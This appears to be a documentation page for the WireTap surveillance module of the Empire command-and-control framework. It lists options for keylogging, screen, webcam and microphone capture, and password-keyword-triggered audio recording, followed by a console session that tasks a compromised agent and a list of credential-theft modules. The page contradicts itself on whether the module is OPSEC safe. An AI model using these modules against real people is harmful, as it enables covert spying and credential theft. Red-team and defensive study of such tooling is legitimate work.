Invoke-WireTap - Empire Module
This page contains detailed information about how to use the powershell/collection/WireTap Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: Invoke-WireTap
Module: powershell/collection/WireTap
Source code [1]: empire/server/modules/powershell/collection/WireTap.yaml
Source code [2]: empire/server/modules/powershell/collection/WireTap.py
MITRE ATT&CK:
T1123, T1125, T1056
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: No
WireTap is a .NET 4.0 project to consolidate several functions used to interact with a user's hardware, including: Screenshots (Display + WebCam Imaging), Audio (Both line-in and line-out), Keylogging, & Activate voice recording when the user says a keyword phrase. Note: Only one method can be ran at a time.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the WireTap module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the WireTap module:
Agent
Agent to run on.
Additional Module Options
This is a list of additional options that are supported by the WireTap module:
capture_screen
Screenshot the current user's screen.
capture_webcam
Capture images from the user's attached webcam (if it exists).
keylogger
Begin logging keystrokes to a file.
listen_for_passwords
Listens for words 'username', 'password', 'login' and 'credential', and when heard, starts an audio recording for two minutes.
record_audio
Record audio from both the microphone and the speakers. Default: 10s.
record_mic
Record audio from the attached microphone (line-in).
Default value: True
.
record_sys
Record audio from the system speakers (line-out).
time
Time to record mic, sys, or audio. Time suffix can be s/m/h.
Default value: 10s
.
WireTap Example Usage
Here's an example of how to use the WireTap module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/collection/WireTap
Author @mDoi12mdjf
@S3cur3Th1sSh1t
Background False
Comments https://github.com/djhohnstein/WireTap
Description WireTap is a .NET 4.0 project to consolidate several functions used to
interact with a user's hardware, including: Screenshots (Display +
WebCam Imaging), Audio (Both line-in and line-out), Keylogging, &
Activate voice recording when the user says a keyword phrase. Note:
Only one method can be ran at a time.
Language powershell
Name powershell/collection/WireTap
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1123
http://attack.mitre.org/techniques/T1125
http://attack.mitre.org/techniques/T1056
,Record Options--------,-------,----------,-------------------------------------,
| Name | Value | Required | Description |
|----------------------|-------|----------|-------------------------------------|
| Agent | | True | Agent to run on. |
|----------------------|-------|----------|-------------------------------------|
| capture_screen | | False | Screenshot the current user's |
| | | | screen. |
|----------------------|-------|----------|-------------------------------------|
| capture_webcam | | False | Capture images from the user's |
| | | | attached webcam (if it exists). |
|----------------------|-------|----------|-------------------------------------|
| keylogger | | False | Begin logging keystrokes to a file. |
|----------------------|-------|----------|-------------------------------------|
| listen_for_passwords | | False | Listens for words 'username', |
| | | | 'password', 'login' and |
| | | | 'credential', and when heard, |
| | | | starts an audio recording for two |
| | | | minutes. |
|----------------------|-------|----------|-------------------------------------|
| record_audio | | False | Record audio from both the |
| | | | microphone and the speakers. |
| | | | Default: 10s |
|----------------------|-------|----------|-------------------------------------|
| record_mic | True | False | Record audio from the attached |
| | | | microphone (line-in). |
|----------------------|-------|----------|-------------------------------------|
| record_sys | | False | Record audio from the system |
| | | | speakers (line-out). |
|----------------------|-------|----------|-------------------------------------|
| time | 10s | False | Time to record mic, sys, or audio. |
| | | | Time suffix can be s/m/h. |
'----------------------'-------'----------'-------------------------------------'
(Empire: usemodule/powershell/collection/WireTap) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/collection/WireTap) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Authors
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/collection/WireTap.yaml
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/collection/WireTap.py
- https://github.com/djhohnstein/WireTap
- http://attack.mitre.org/techniques/T1123
- http://attack.mitre.org/techniques/T1125
- http://attack.mitre.org/techniques/T1056
See Also
Check also the following modules related to this module:
- powershell/collection/get_sql_query
- powershell/collection/SharpLoginPrompt
- powershell/collection/file_finder
- powershell/collection/get_indexed_item
- powershell/collection/ninjacopy
- powershell/collection/clipboard_monitor
- powershell/collection/FoxDump
- powershell/collection/prompt
- powershell/collection/minidump
- powershell/collection/netripper
- powershell/collection/SauronEye
- powershell/collection/toasted
- powershell/collection/screenshot
- powershell/collection/find_interesting_file
- powershell/collection/inveigh
- powershell/collection/browser_data
- powershell/collection/WebcamRecorder
- powershell/collection/ChromeDump
- powershell/collection/USBKeylogger
- powershell/collection/get_sql_column_sample_data
- powershell/collection/keylogger
- powershell/collection/get-winupdates
- powershell/collection/packet_capture
- powershell/collection/SharpChromium
- powershell/collection/vaults/remove_keepass_config_trigger
- powershell/collection/vaults/add_keepass_config_trigger
- powershell/collection/vaults/keethief
- powershell/collection/vaults/find_keepass_config
- powershell/collection/vaults/get_keepass_config_trigger
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.